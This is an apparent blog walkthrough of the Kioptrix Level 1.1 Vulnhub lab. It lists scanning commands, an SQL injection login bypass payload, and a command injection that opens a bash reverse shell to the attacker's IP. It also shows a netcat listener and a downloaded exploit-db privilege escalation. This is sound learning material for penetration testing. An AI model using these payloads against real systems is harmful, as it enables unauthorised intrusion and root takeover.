SecureArmors

Kioptrix: Level 1.1 (#2) Walkthrough (Vulnhub | OSCP Model)

Kioptrix: Level 1.1 (#2) Walkthrough Summary (Vulnhub| OSCP Model)

Twitter: https://twitter.com/AppSecJay
LinkedIn: https://www.linkedin.com/in/jaganboda/

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Step by Step process:

Target Machine VM’s IP:
Step 1: I start by figuring out the IP address of the target Kioptrix 2 machine. IP. Using below commands.

netdiscover -r 192.168.0.0/24

Enumeration:

Step 2:Nmap Scan to find out services
nmap -Pn -A -v 192.168.48.156

Step 3: Try to find directory and interesting files form below commands.
dirb http://192.168.48.156
nikto -h http://192.168.48.156

Step 4:explore application for vulnerability
Try default or most common credentials admin:admin

Gaining Access (Exploitation):

Step 5: perform Sql Injection to login the website and perform command Injection to upload the the Bash reverse shell payload and execute it.

Sql Injection
payload: ‘or’1’=’1

Command Injection:
ping 8.8.8.8; bash -i >& /dev/tcp/192.168.48.155/443 0>&1 — {Note:Change IP Address and Port according to your lab set up.}

Start a netcat listener “nc -lvp 443”

Useful payload link: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Privilege Escalation :

Step 6:Get the reverse shell. upload the shell code
https://www.exploit-db.com/download/9542
sudo python -m SimpleHTTPServer 8086

Step 7:Download shell Code from Attacker machine (kali linux) and compile and execute
gcc 9542.c
./a.out

Boom.. Got root Shell

Clean up:
Just Restart a victim machine for clean up.

Its quite easy and straight forward!

DISCLAIMER: Kioptrix is not responsible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet – or Interwebs..)

Good luck and have fun!